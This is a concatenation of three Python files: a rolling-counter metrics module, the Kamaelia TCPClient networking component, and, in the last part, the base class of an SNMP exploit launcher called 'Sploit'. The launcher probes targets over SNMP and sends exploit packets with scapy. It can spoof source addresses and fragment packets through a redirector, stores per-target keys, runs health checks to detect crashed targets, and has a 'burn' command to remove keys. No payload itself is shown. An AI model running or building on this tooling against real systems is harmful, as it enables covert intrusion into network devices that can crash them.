last_bucket = self.buckets.peek_last()
if last_bucket:
self.cumulative.add_bucket(last_bucket)
self.buckets.clear()
def rolling_sum(self, event):
""" Rolling sum
Get the sum of all buckets in the rolling counter for the given
:class:`RollingNumberEvent`.
The :class:`RollingNumberEvent` must be a **counter** type
>>> RollingNumberEvent.isCounter()
True
Args:
event (:class:`RollingNumberEvent`): Event defining which counter
to retrieve values from.
Returns:
long: Return value from the given :class:`RollingNumberEvent`
counter type.
"""
last_bucket = self.current_bucket()
if not last_bucket:
return 0
sum = 0
for bucket in self.buckets:
sum += bucket.adder(event).sum()
return sum
def rolling_max(self, event):
values = self.values(event)
if not values:
return 0
else:
return values[len(values) - 1]
def values(self, event):
last_bucket = self.current_bucket()
if not last_bucket:
return 0
values = []
for bucket in self.buckets:
if event.is_counter():
values.append(bucket.adder(event).sum())
if event.is_max_updater():
values.append(bucket.max_updater(event).max())
return values
def value_of_latest_bucket(self, event):
last_bucket = self.current_bucket()
if not last_bucket:
return 0
return last_bucket.get(event)
def cumulative_sum(self, event):
""" Cumulative sum
The cumulative sum of all buckets ever since the start without
rolling for the given :class`RollingNumberEvent` type.
See :meth:`rolling_sum` for the rolling sum.
The :class:`RollingNumberEvent` must be a **counter** type
>>> RollingNumberEvent.isCounter()
True
Args:
event (:class:`RollingNumberEvent`): Event defining which
**counter** to increment.
Returns:
long: Returns the cumulative sum of all **increments** and
**adds** for the given :class:`RollingNumberEvent` **counter**
type.
"""
return self.value_of_latest_bucket(event) + self.cumulative.get(event)
class BucketCircular(deque):
''' This is a circular array acting as a FIFO queue. '''
def __init__(self, size):
super(BucketCircular, self).__init__(maxlen=size)
@property
def size(self):
return len(self)
def last(self):
return self.peek_last()
def peek_last(self):
try:
return self[0]
except IndexError:
return None
def add_last(self, bucket):
self.appendleft(bucket)
class Bucket(object):
""" Counters for a given :class:`Bucket` of time
We support both :class:`LongAdder` and :class:`LongMaxUpdater` in a
:class:`Bucket` but don't want the memory allocation of all types for each
so we only allocate the objects if the :class:`RollingNumberEvent` matches
the correct **type** - though we still have the allocation of empty arrays
to the given length as we want to keep using the **type** value for fast
random access.
"""
def __init__(self, start_time):
self.window_start = start_time
self._adder = {}
self._max_updater = {}
# TODO: Change this to use a metaclass
for name, event in RollingNumberEvent.__members__.items():
if event.is_counter():
self._adder[event.name] = LongAdder()
for name, event in RollingNumberEvent.__members__.items():
if event.is_max_updater():
self._max_updater[event.name] = LongMaxUpdater()
def get(self, event):
if event.is_counter():
return self.adder(event).sum()
if event.is_max_updater():
return self.max_updater(event).max()
raise Exception('Unknown type of event.')
# TODO: Rename to add
def adder(self, event):
if event.is_counter():
return self._adder[event.name]
raise Exception('Type is not a LongAdder.')
# TODO: Rename to update_max
def max_updater(self, event):
if event.is_max_updater():
return self._max_updater[event.name]
raise Exception('Type is not a LongMaxUpdater.')
class LongAdder(object):
def __init__(self, min_value=0):
self.count = Value('i', min_value)
# TODO: What is best it or get lock direct from self.count
# as described in multiprocessing.Value doc.
self.lock = Lock()
def increment(self):
with self.lock:
self.count.value += 1
def decrement(self):
with self.lock:
self.count.value -= 1
def sum(self):
with self.lock:
return self.count.value
def add(self, value):
with self.lock:
self.count.value += value
class LongMaxUpdater(object):
def __init__(self, min_value=0):
self.count = Value('i', min_value)
# TODO: What is best it or get lock direct from self.count
# as described in multiprocessing.Value doc.
self.lock = Lock()
def max(self):
with self.lock:
return self.count.value
def update(self, value):
if value > self.max():
with self.lock:
self.count.value = value
class CumulativeSum(object):
def __init__(self):
self._adder = {}
self._max_updater = {}
# TODO: Change this to use a metaclass
for name, event in RollingNumberEvent.__members__.items():
if event.is_counter():
self._adder[event.name] = LongAdder()
for name, event in RollingNumberEvent.__members__.items():
if event.is_max_updater():
self._max_updater[event.name] = LongMaxUpdater()
def add_bucket(self, bucket):
for name, event in RollingNumberEvent.__members__.items():
if event.is_counter():
self.adder(event).add(bucket.adder(event).sum())
if event.is_max_updater():
self.max_updater(event).update(bucket.max_updater(event).max())
def get(self, event):
if event.is_counter():
return self.adder(event).sum()
if event.is_max_updater():
return self.max_updater(event).max()
raise Exception('Unknown type of event.')
def adder(self, event):
if event.is_counter():
return self._adder[event.name]
raise Exception('Unknown type of event.')
def max_updater(self, event):
if event.is_max_updater():
return self._max_updater[event.name]
raise Exception('Unknown type of event.')
def _is_function(obj):
return isinstance(obj, types.FunctionType)
def _is_dunder(name):
return (name[:2] == name[-2:] == '__' and
name[2:3] != '_' and
name[-3:-2] != '_' and
len(name) > 4)
class Event(object):
def __init__(self, name, value):
self._name = name
self._value = value
def is_counter(self):
return self._value == 1
def is_max_updater(self):
return self._value == 2
@property
def name(self):
return self._name
@property
def value(self):
return self._value
class EventMetaclass(type):
def __new__(cls, name, bases, attrs):
__members = {}
for name, value in attrs.items():
if not _is_dunder(name) and not _is_function(value):
__members[name] = Event(name, value)
for name, value in __members.items():
attrs[name] = __members[name]
new_class = super(EventMetaclass, cls).__new__(cls, name,
bases, attrs)
setattr(new_class, '__members__', __members)
return new_class
class RollingNumberEvent(six.with_metaclass(EventMetaclass, object)):
""" Various states/eveents that can be captured in the
:class:`RollingNumber`.
Note that events are defined as different types:
>>> self.is_counter() == True
True
>>> self.is_max_updater() == True
True
The **counter** type events can be used with
:meth:`RollingNumber.increment`, :meth:`RollingNumber.add`,
:meth:`RollingNumber.rolling_sum` and others.
The **max updater** type events can be used with
:meth:`RollingNumber.update_rolling_max` and
:meth:`RollingNumber.rolling_max_value`.
"""
SUCCESS = 1
FAILURE = 1
TIMEOUT = 1
SHORT_CIRCUITED = 1
THREAD_POOL_REJECTED = 1
SEMAPHORE_REJECTED = 1
FALLBACK_SUCCESS = 1
FALLBACK_FAILURE = 1
FALLBACK_REJECTION = 1
EXCEPTION_THROWN = 1
THREAD_EXECUTION = 1
THREAD_MAX_ACTIVE = 2
COLLAPSED = 1
RESPONSE_FROM_CACHE = 1
def __init__(self, event):
self._event = event
def is_counter(self):
""" Is counter
Returns:
bool: Returns ``True`` event type is **counter**, otherwise
it returns ``False`` .
"""
return self._event.value == 1
def is_max_updater(self):
""" Is mas updater
Returns:
bool: Returns ``True`` event type is **max updater**, otherwise
it returns ``False`` .
"""
return self._event.value == 2
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FIXME: Uses the selector service, but has no way of indicating to the
# selector service that its services are no longer required.
# This needs resolving.
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
"""\
=================
Simple TCP Client
=================
This component is for making a TCP connection to a server. Send to its "inbox"
inbox to send data to the server. Pick up data received from the server on its
"outbox" outbox.
Example Usage
-------------
Sending the contents of a file to a server at address 1.2.3.4 on port 1000::
Pipeline( RateControlledFileReader("myfile", rate=100000),
TCPClient("1.2.3.4", 1000),
).activate()
Example Usage - SSL
-------------------
It is also possible to cause the TCPClient to switch into SSL mode. To do this
you send it a message on its "makessl" inbox. It is necessary for a number of
protocols to be able to switch between non-ssl and ssl, hence this approach
rather than simply saying "ssl client" or "non-ssl client"::
Graphline(
MAKESSL = OneShot(" make ssl "),
CONSOLE = ConsoleReader(),
ECHO = ConsoleEchoer(),
CONNECTION = TCPClient("kamaelia.svn.sourceforge.net", 443),
linkages = {
("MAKESSL", "outbox"): ("CONNECTION", "makessl"),
("CONSOLE", "outbox"): ("CONNECTION", "inbox"),
("CONNECTION", "outbox"): ("ECHO", "inbox"),
}
)
How does it work?
-----------------
TCPClient opens a socket connection to the specified server on the specified
port. Data received over the connection appears at the component's "outbox"
outbox as strings. Data can be sent as strings by sending it to the "inbox"
inbox.
An optional delay (between component activation and attempting to connect) can
be specified. The default is no delay.
It creates a ConnectedSocketAdapter (CSA) to handle the socket connection and
registers it with a selectorComponent so it is notified of incoming data. The
selectorComponent is obtained by calling
selectorComponent.getSelectorService(...) to look it up with the local
Coordinating Assistant Tracker (CAT).
TCPClient wires itself to the "CreatorFeedback" outbox of the CSA. It also wires
its "inbox" inbox to pass data straight through to the CSA's "inbox" inbox,
and its "outbox" outbox to pass through data from the CSA's "outbox" outbox.
Socket errors (after the connection has been successfully established) may be
sent to the "signal" outbox.
This component will terminate if the CSA sends a socketShutdown message to its
"CreatorFeedback" outbox.
This component will terminate if a shutdownMicroprocess or producerFinished
message is sent to its "control" inbox. This message is forwarded onto the CSA.
TCPClient will then wait for the CSA to terminate. It then sends its own
shutdownMicroprocess message out of the "signal" outbox.
"""
import sys
import socket
import errno
import Axon
from Axon.util import Finality
from Axon.Ipc import producerFinished, shutdownMicroprocess
from Axon.Ipc import newComponent, status
from Kamaelia.IPC import socketShutdown, newCSA
from Kamaelia.IPC import newReader, newWriter
from Kamaelia.IPC import removeReader, removeWriter
from Kamaelia.Internet.ConnectedSocketAdapter import ConnectedSocketAdapter
from Kamaelia.Internet.Selector import Selector
# from Kamaelia.Apps.SocialBookmarks.Print import Print # For debug purposes
import time
class TCPClient(Axon.Component.component):
"""\
TCPClient(host,port[,delay]) -> component with a TCP connection to a server.
Establishes a TCP connection to the specified server.
Keyword arguments:
- host -- address of the server to connect to (string)
- port -- port number to connect on
- delay -- delay (seconds) after activation before connecting (default=0)
"""
Inboxes = { "inbox" : "data to send to the socket",
"_socketFeedback" : "notifications from the ConnectedSocketAdapter",
"control" : "Shutdown signalling",
"makessl" : "Notifications to the ConnectedSocketAdapter that we want to negotiate SSL",
}
Outboxes = { "outbox" : "data received from the socket",
"signal" : "socket errors",
"_selectorSignal" : "For registering and deregistering ConnectedSocketAdapter components with a selector service",
"sslready" : "SSL negotiated successfully",
}
Usescomponents=[ConnectedSocketAdapter] # List of classes used.
def __init__(self,host,port,delay=0, connect_timeout=60, wait_for_serverclose = False):
"""x.__init__(...) initializes x; see x.__class__.__doc__ for signature"""
super(TCPClient, self).__init__()
self.host = host
self.port = port
self.delay=delay
self.CSA = None
self.sock = None
self.howDied = None
self.connect_timeout = connect_timeout
self.wait_for_serverclose = wait_for_serverclose
def main(self):
"""Main loop."""
# wait before connecting
waitUntil = time.time() + self.delay
while time.time() < waitUntil:
yield 1
for v in self.runClient():
yield v
if (self.sock is not None) and (self.CSA is not None):
self.send(removeReader(self.CSA, self.sock), "_selectorSignal")
self.send(removeWriter(self.CSA, self.sock), "_selectorSignal")
def setupCSA(self, sock):
"""\
setupCSA(sock) -> new ConnectedSocketAdapter component
Creates a ConnectedSocketAdapter component for the socket, and wires up to
it. Also sends the CSA to the "selector" service.
"""
selectorService, selectorShutdownService, newSelector = Selector.getSelectorServices(self.tracker)
if newSelector:
self.addChildren(newSelector)
CSA = ConnectedSocketAdapter(sock, selectorService) # self.createConnectedSocket(sock)
self.addChildren(CSA)
self.link((self, "_selectorSignal"),selectorService)
self.link((CSA, "CreatorFeedback"),(self,"_socketFeedback"))
self.link((CSA, "outbox"), (self, "outbox"), passthrough=2)
self.link((CSA, "sslready"), (self, "sslready"), passthrough=2)
self.link((self, "inbox"), (CSA, "inbox"), passthrough=1)
self.link((self, "makessl"), (CSA, "makessl"), passthrough=1)
self.link((self, "control"), (CSA, "control"), passthrough=1) # propagate shutdown msgs
self.send(newReader(CSA, ((CSA, "ReadReady"), sock)), "_selectorSignal")
self.send(newWriter(CSA, ((CSA, "SendReady"), sock)), "_selectorSignal")
self.CSA = CSA # We need this for shutdown later
return self.childComponents()
def waitCSAClose(self):
"""Returns True if a socketShutdown message is received on "_socketFeedback" inbox."""
if self.dataReady("_socketFeedback"):
message = self.recv("_socketFeedback")
if isinstance(message, socketShutdown):
try:
socket, howdied = message
self.howDied = howdied
except TypeError:
self.howDied = None
return False
return True
def safeConnect(self, sock, *sockArgsList):
"""\
Connect to socket and handle possible errors that may occur.
Returns True if successful, or False on failure. Unhandled errors are raised
as exceptions.
"""
try:
sock.connect(*sockArgsList); # Expect socket.error: (115, 'Operation now in progress')
# EALREADY
# The socket is non-blocking and a previous connection
# attempt has not yet been completed.
self.connecting=0
return True
except socket.error:
msg = sys.exc_info()[1]
(errorno, errmsg) = msg.args
if errorno==errno.EALREADY:
# The socket is non-blocking and a previous connection attempt has not yet been completed
# We handle this by allowing the code to come back and repeatedly retry
# connecting. This is a valid, if brute force approach.
assert(self.connecting==1)
return False
elif errorno==errno.EINPROGRESS or errorno==errno.EWOULDBLOCK:
#The socket is non-blocking and the connection cannot be completed immediately.
# We handle this by allowing the code to come back and repeatedly retry
# connecting. Rather brute force.
if not getattr(self, 'connecting', 0):
self.connecting=1
return False # Not connected should retry until no error
else:
# MSW doesn't raise a nice connection refused exception. Instead
# we detect going from a WSAEINVAL (like EALREADY for windows) back to a
# EWOULDBLOCK which means the connection was refused and we are trying to
# connect for a second time.
raise errno.ECONNREFUSED
elif errorno == errno.EISCONN:
# This is a windows error indicating the connection has already been made.
self.connecting = 0 # as with the no exception case.
return True
elif hasattr(errno, "WSAEINVAL"):
if errorno == errno.WSAEINVAL:
# If we are on windows, this will be the error instead of EALREADY
# above.
assert(self.connecting==1)
return False
else:
raise socket.msg # We're on windows platform and unk exception occurred
# Anything else is an error we don't handle
else:
raise socket.msg
def runClient(self,sock=None):
# The various numbers yielded here indicate progress through the function, and
# nothing else specific.
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); yield 0.3
# Print( "GOT SOCK" )
self.sock = sock # We need this for shutdown later
try:
sock.setblocking(0); yield 0.6
# Print( "GOT A NON BLOCK" )
try:
tryUntil = time.time() + self.connect_timeout
# Print( "GOT A ODD SOCK" )
while not self.safeConnect(sock,(self.host, self.port)):
if self.shutdown():
return
if time.time() >= tryUntil:
self.howDied = "timeout"
raise Finality
yield 1
# Print( "CONNECTED" )
yield newComponent(*self.setupCSA(sock))
while self.waitCSAClose():
self.pause()
yield 2
raise Finality
except Exception:
x = sys.exc_info()[1]
# Print( "SHUTTING SOCK",x )
result = sock.shutdown(2) ; yield 3
raise x # XXXX If X is not finality, an error message needs to get sent _somewhere_ else
# The logical place to send the error is to the signal outbox
except Exception:
x = sys.exc_info()[1]
# Print( "CLOSING SOCK",x )
sock.close() ; yield 4,x # XXXX If X is not finality, an error message needs to get sent _somewhere_ else
raise x
except Finality:
# Print( "LOOKING GOOD SOCK" )
yield 5
except socket.error:
e = sys.exc_info()[1]
# We now do the flipside of setupCSA, whether we had an error or not
# A safe error relates to a disconnected server, and unsafe error is generally
# bad. However either way, it's gone, let's let the person using this
# component know, shutdown everything, and get outta here.
#
# FIXME: Set self.howDied here as well
#
# Print( "SMELLY SOCK", e )
pass
self.send(producerFinished(self,self.howDied), "signal")
# self.send(e, "signal")
# "TCPC: Exitting run client"
def stop(self):
"""Stop method provided to allow the scheduler to kill TCPClient connections cleanly if necessary.
(Only rarely, if ever, needed - you are not expected to call this yourself)"""
try:
self.sock.shutdown(2)
except:
pass # Well, we tried.
try:
self.sock.close()
except:
pass # Well, we tried.
self.send(producerFinished(self,self.howDied), "signal")
if (self.sock is not None) and (self.CSA is not None):
self.send(removeReader(self.CSA, self.sock), "_selectorSignal")
self.send(removeWriter(self.CSA, self.sock), "_selectorSignal")
self.send(producerFinished(),"signal")
super(TCPClient, self).stop()
def shutdown(self):
while self.dataReady("control"):
msg = self.recv("control")
if not self.wait_for_serverclose:
self.send(msg,"signal")
return isinstance(msg, (producerFinished,shutdownMicroprocess))
else:
if isinstance(msg, shutdownMicroprocess):
self.send(msg,"signal")
return True
return False
__kamaelia_components__ = ( TCPClient, )
if __name__ =="__main__":
from Axon.Scheduler import scheduler
from Kamaelia.Chassis.ConnectedServer import SimpleServer
from Kamaelia.Protocol.FortuneCookieProtocol import FortuneCookieProtocol
from Kamaelia.Util.Console import ConsoleEchoer
from Axon.Component import component
class testHarness(component): # Spike component to test interoperability with TCPServer
def __init__(self):
super(testHarness, self).__init__() # I wonder if this can get forced to be called automagically?
import random
self.serverport = random.randint(4000,8000)
self.server = SimpleServer(protocol=FortuneCookieProtocol, port=self.serverport)
self.client = None
self.display = ConsoleEchoer()
def initialiseComponent(self):
self.client = TCPClient("127.0.0.1",self.serverport, delay=1)
self.addChildren(self.server,self.client,self.display)
# self.addChildren(self.server, self.display)
self.link((self.client,"outbox"), (self.display,"inbox") )
return Axon.Ipc.newComponent(*(self.children))
def mainBody(self):
return 1
t = testHarness()
t.activate()
scheduler.run.runThreads(slowmo=0)
|
|
#!/usr/bin/env python
import sys
import os
# Note: Need so that we can find the scapy code.
bindir = os.path.dirname(os.path.abspath(sys.argv[0]))
directory = '%s/..'%bindir
if not directory in sys.path:
sys.path.insert(0, '%s/..'%bindir)
import socket
import argparse
import random
import struct
import traceback
import glob
from hexdump import hexdump
from scapy.all import ASN1_OID, fragment, IP, SNMP, SNMPget, SNMPvarbind, UDP
from tempfile import mkstemp
from log import Log
def public(f):
'''
'''
return f
def internal(f):
'''
'''
return f
def overridable(comment):
'''
'''
def decorator(f): return f
return decorator
class Sploit(object):
'''
'''
DEFAULT_FRAGMENT_SIZE = 460
def __init__(self, tool_name, tool_version):
self.tool_name = tool_name
self.tool_version = tool_version
self.terminateFlingOnException = False
self.env = argparse.Namespace()
self.params = argparse.Namespace()
self.key_data = None
self.vinfo = None
self.log = Log(self.tool_name, self.tool_version)
self.log.open()
self._init_parser()
def __del__(self):
self.log.close()
self.log = None
@property
def description(self):
'''
'''
return '%s (version %s)' % (self.tool_name, self.tool_version)
def _init_parser(self):
'''
'''
self.parser = argparse.ArgumentParser(description = self.description)
self.subcommands = []
self.setup_parser()
subcommands = self.subcommands
del self.subcommands
if subcommands:
subparsers = self.parser.add_subparsers()
for subcommand in subcommands:
subparser = subparsers.add_parser(subcommand.name)
subparser.set_defaults(subcommand = subcommand)
subcommand.setup_parser(subparser)
@public
def add_subcommand(self, subcommand):
'''
'''
self.subcommands.append(subcommand)
@internal
@overridable("Overrides must call base implementation first")
def setup_parser(self):
'''
'''
self.add_logging_params(self.parser)
@internal
def create_socket(self, ip = None, port = None, timeout = None):
'''
'''
if self.params.redir:
exsock = FragmentingPseudoSocket(self.params.dst['ip'], self.params.dst['port'], **self.params.redir)
exsock.fragment_size = self.params.fragment_size or self.DEFAULT_FRAGMENT_SIZE
exsock.raw_send = self.params.raw_send
else:
exsock = PseudoSocket(self.params.dst['ip'], self.params.dst['port'])
exsock.timeout = self.params.timeout
exsock.verbose = self.params.verbose
exsock.log = self.log
return exsock
@overridable("Overrides must call base implementation first")
def pre_parse(self, args):
'''
'''
self.params.args = args
self.env.progname = args[0]
self.env.progbase = os.path.basename(args[0])
self.env.progpath = os.path.realpath(os.path.dirname(args[0]))
def _parse(self, args):
'''
'''
self.pre_parse(args)
self.parser.parse_args(args[1:], self.params)
try:
self.post_parse()
except argparse.ArgumentError, e:
self.parser.error(str(e))
@overridable("Overrides must call base implementation first")
def post_parse(self):
'''
'''
defaults = {'healthcheck': False,
'healthcheckport': None,
'key': None,
'redir': None,
'fragment_size': None,
'subcommand': None,
}
for param in defaults:
if not hasattr(self.params, param):
setattr(self.params, param, defaults[param])
self.params.debug = self.enable_debugging()
if self.params.debug:
self.params.Debug = self.params.verbose
else:
self.params.Debug = 0
if not self.params.redir and self.params.fragment_size:
Sploit.parse_error('The fragment size can only be specified when --redirect or --spoof is used.')
if self.params.healthcheckport:
if not self.params.healthcheck:
Sploit.parse_error('The TCP port for health checks was specified without enabling health checks.')
else:
if self.params.redir and not self.params.redir['listen_port'] and self.params.healthcheck:
Sploit.parse_error('Health checks are not currently supported when spoofing the source address. You must include the --no-health-check option.')
if self.params.key and not os.path.isfile(self.get_key_file()):
Sploit.parse_error("Key file '%s' does not exist" % self.params.key)
if self.params.subcommand:
self.params.subcommand.post_parse(self.params)
@internal
@staticmethod
def parse_error(msg):
'''
'''
raise argparse.ArgumentError(None, msg)
@public
@staticmethod
def add_connection_params(parser, include_spoof = True):
'''
'''
parser.add_argument('-t','--target',
dest = 'dst',
required = True,
type = _parse_target,
help = 'target ip[:port]')
if include_spoof:
parser.add_argument('--spoof',
dest = 'redir',
metavar = 'redir_ip:redir_port:spoofed_ip[:spoofed_port]',
type = lambda x: _parse_redirect(x, False),
default = None,
help = 'send spoofed src packet (with no response expected)')
parser.add_argument('--fragment',
dest = 'redir',
metavar = 'outbound_tunnel_local_ip:outbound_tunnel_local_port:return_tunnel_remote_ip:return_tunnel_remote_port:listen_port',
type = lambda x: _parse_redirect(x, True),
default = None,
help = 'send fragmented packet through redirector (expecting a response)')
parser.add_argument('--fragment-size',
dest = 'fragment_size',
type = int,
default = None,
help = 'maximum fragment size')
parser.add_argument('--nopen-rawsend',
dest = 'raw_send',
action = 'store_true',
default = False,
help = 're-open the connection for each fragment')
parser.add_argument('--no-nopen-rawsend',
dest = 'raw_send',
action = 'store_false',
default = False,
help = 'use the same connection for each fragment')
parser.add_argument('-c','--community',
dest = 'community',
required = True,
help = 'community string')
parser.add_argument('--version',
dest = 'version',
choices = ['v1','v2c'],
default = 'v2c',
help = 'snmp version v1|v2c defaults to v2c')
parser.add_argument('-w','--wait','--timeout',
dest = 'timeout',
type = int,
default = 30,
help = 'sets timeout for connections')
@public
@staticmethod
def add_logging_params(parser):
'''
'''
parser.add_argument('-v','--verbose',
dest = 'verbose',
action = 'count',
default = 1,
help = 'verbose logging, add more -v for more verbose logging')
parser.add_argument('-q','--quiet',
dest = 'verbose',
action = 'store_const',
const = 0,
help = 'minimize logging (not recommended)')
@public
@staticmethod
def add_key_params(parser):
'''
'''
parser.add_argument('-k', '--key',
dest = 'key',
help = "info key - returned from info query")
@public
@staticmethod
def add_healthcheck_params(parser):
'''
'''
parser.add_argument('--health-check',
dest = 'healthcheck',
action = 'store_true',
default = True,
help = 'enable health checks (default)')
parser.add_argument('--no-health-check',
dest = 'healthcheck',
action = 'store_false',
default = True,
help = "disable health checks")
parser.add_argument('--health-check-port',
dest = 'healthcheckport',
type = _parse_port,
default = None,
help = "TCP port to use for health checks")
@overridable("Overrides don't need to call base implementation")
def enable_debugging(self):
'''
'''
return False
@public
def launch(self, args):
'''
'''
self._parse(args)
self.log('parsed', CommandLine = args)
print "[+] Executing: "," ".join(args)
if self.params.verbose > 1:
print "[+] running from %s" % self.env.progpath
if self.params.subcommand:
self.params.subcommand.run(self)
else:
self.run()
@overridable("Should only be overriden for derived classes that don't use subcommands")
def run(self):
'''
'''
raise NotImplementedError, "Sploit-based classes that don't use subcommands need to override the run method."
@overridable("If overriden, the base implementation does not need to be called.")
def get_key_dir(self):
'''
'''
return '%s/keys' % self.env.progpath
def get_key_file(self, key = None):
'''
'''
if not key:
key = self.params.key
return '%s/%s.key' % (self.get_key_dir(), key)
@overridable("Must be overriden if the target will be touched. Base implementation should not be called.")
def generate_touch(self):
'''
'''
raise NotImplementedError, "Sploit-based classes need to override the generate_touch method."
@internal
def send_touch(self, packet = None, exsock = None, attempts = 1):
'''
'''
print '[+] probing target via snmp'
if not packet:
packet = self.generate_touch()
try:
if not exsock:
print "[+] Connecting to %s:%s" % (self.params.dst['ip'], self.params.dst['port'])
exsock = self.create_socket()
while attempts:
attempts -= 1
self.log.packet('sending touch packet', str(packet))
exsock.send(packet)
self.log('sent touch packet')
try:
while 1:
print '*'*40
self.log('receiving touch response')
response = exsock.receive(2048)
self.log.packet('received touch response', response)
if self.params.verbose > 1:
print '[+] Data returned'
hexdump(response)
SNMP(response).show()
print '[+] End of Data returned\n'
if self.post_touch(response):
return True
else:
print response
print '*'*40
print 'listening for responses - Ctrl-C to exit'
except KeyboardInterrupt:
return False
except socket.timeout:
if not attempts:
return False
print 'Retrying...'
except Exception,message:
print '\nExiting ...'
print 'Debug info ','='*40
traceback.print_exc()
print 'Debug info ','='*40
raise RuntimeError,message
@overridable("Must be overriden if the target will be touched. Base implementation should not be called.")
def post_touch(self, response):
'''
'''
raise NotImplementedError, "Sploit-based classes need to override the post_touch method."
@overridable("Should be overriden if the 'info' or 'force' subcommands will be used. Base implementation should be called.")
def report_key(self, key):
'''
'''
pass
@overridable("Should be overriden if checks need to be done before the exploit is called.")
def pre_exploit(self):
'''
'''
pass
@overridable("Must be overriden. Base implementation should not be called.")
def generate_exploit(self):
'''
'''
raise NotImplementedError, "Sploit-based classes need to override the generate_exploit method."
@internal
def send_exploit(self, packets = None, exsock = None):
'''
'''
if not packets:
packets = self.generate_exploit()
if not exsock:
print "[+] Connecting to %s:%s" % (self.params.dst['ip'], self.params.dst['port'])
exsock = self.create_socket()
try:
tail = ' of %d' % len(packets)
except TypeError:
tail =' of N'
cur = 1
for packet in packets:
print "[+] packet %d%s"%(cur,tail)
try:
packet = packet[SNMP]
except:
pass
if self.params.verbose:
hexdump(str(packet))
if self.params.verbose > 1:
packet.show()
self.log.packet('sending exploit packet', str(packet))
exsock.send(packet)
self.log('sent exploit packet')
if exsock.expecting_response:
try:
if self.params.verbose:
print '*'*40
self.log('receiving exploit response')
response = exsock.receive(2048)
self.log.packet('sent exploit packet', response)
if self.post_exploit(response):
print "[+] clean return detected"
elif self.params.healthcheck:
print "[-] unexpected response received - performing health check"
self.perform_healthcheck(exsock)
else:
print "[-] unexpected response received"
except KeyboardInterrupt,e:
print "[-] keyboard interrupt before response received"
if self.terminateFlingOnException:
raise KeyboardInterrupt,e
except socket.timeout,e:
okay = False
if self.params.healthcheck:
print "[-] timeout waiting for response - performing health check"
okay = self.perform_healthcheck(exsock)
else:
print "[-] timeout waiting for response - target may have crashed"
if not okay and self.terminateFlingOnException:
raise socket.timeout,e
elif self.params.healthcheck:
print "[+] not expecting response - performing health check"
self.perform_healthcheck(exsock)
else:
print "[+] not expecting response"
cur += 1
@overridable("Overrides do not need to call the base implementation")
def post_exploit(self, response):
'''
'''
snmp = SNMP(response)
if self.params.verbose:
snmp.show()
if self.params.verbose > 1:
hexdump(response)
print "[+] response received"
return True
@internal
def perform_healthcheck(self, exsock):
'''
'''
healthy = False
if self.params.healthcheckport:
healthy = exsock.establish_tcp_connection(self.params.healthcheckport)
else:
oid = '1.3.6.1.2.1.1.3.0'
pkt = SNMP(community=self.params.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID(oid))]))
exsock.send(pkt[SNMP])
try:
response = exsock.receive(2048)
healthy = True
except KeyboardInterrupt,e:
print "[-] keyboard interrupt before response received"
if self.terminateFlingOnException:
raise KeyboardInterrupt,e
except socket.timeout,e:
okay = False
print "[-] no response from health check - target may have crashed"
if not okay and self.terminateFlingOnException:
raise socket.timeout,e
if healthy:
print "[+] health check succeeded"
else:
print "[-] health check failed"
return healthy
class Subcommand(object):
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
'''
'''
Sploit.add_logging_params(parser)
@overridable("Overrides should call base implementation first")
def post_parse(self, params):
'''
'''
pass
@overridable("Overrides don't need to call base implementation")
def run(self, exp):
'''
'''
pass
class _KeyCreationSubcommand(Subcommand):
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
super(_KeyCreationSubcommand, self).setup_parser(parser)
@overridable("Overrides don't need to call base implementation")
def run(self, exp):
self.get_key_data(exp)
exp.load_vinfo()
if not os.path.isdir(exp.get_key_dir()):
os.mkdir(exp.get_key_dir())
fd, filename = mkstemp(dir = exp.get_key_dir(), prefix='', suffix='.key')
os.write(fd, exp.key_data + '\n')
key = filename.split('/')[-1][:-4]
os.close(fd)
exp.report_key(key)
@overridable("Must be overriden. Base implementation should not be called.")
def get_key_data(self, exp):
raise NotImplementedError, "_KeyCreationSubcommand derived classes must override the get_key_data method."
class ForceSubcommand(_KeyCreationSubcommand):
name = 'force'
label = 'key_data'
help = 'data used to populate the key file'
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
super(ForceSubcommand, self).setup_parser(parser)
parser.add_argument(dest = 'key_data',
metavar = self.label,
help = self.help)
def get_key_data(self, exp):
exp.key_data = exp.params.key_data
class InfoSubcommand(_KeyCreationSubcommand):
name = 'info'
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
super(InfoSubcommand, self).setup_parser(parser)
Sploit.add_connection_params(parser, include_spoof=False)
def get_key_data(self, exp):
if not exp.send_touch():
raise RuntimeError, '[-] Touch failed.'
class ExecSubcommand(Subcommand):
name = 'exec'
perform_health_check = True
expect_filename_argument = True
filename_label = 'filename'
filename_help = 'payload used for the exploit'
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
super(ExecSubcommand, self).setup_parser(parser)
Sploit.add_connection_params(parser)
Sploit.add_key_params(parser)
if self.expect_filename_argument:
def file_exists(filename):
if not os.path.isfile(filename):
Sploit.parse_error("The file '%s' does not exist." % filename)
return filename
parser.add_argument(dest = 'filename',
metavar = self.filename_label,
type = file_exists,
help = self.filename_help)
if self.perform_health_check:
Sploit.add_healthcheck_params(parser)
@overridable("Overrides don't need to call base implementation")
def run(self, exp):
if exp.params.key:
with open(exp.get_key_file(),'r') as keyfile:
exp.key_data = keyfile.readline().strip()
else:
if not exp.send_touch():
raise RuntimeError, '[-] Touch failed. Aborting.'
exp.load_vinfo()
exp.pre_exploit()
exp.send_exploit()
class BurnSubcommand(Subcommand):
name = 'burn'
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
'''
'''
super(BurnSubcommand, self).setup_parser(parser)
group = parser.add_mutually_exclusive_group(required = True)
Sploit.add_key_params(group)
group.add_argument('--all','--Burn',
action = 'store_true',
dest = 'burnburn',
default = False,
help = "remove all keys")
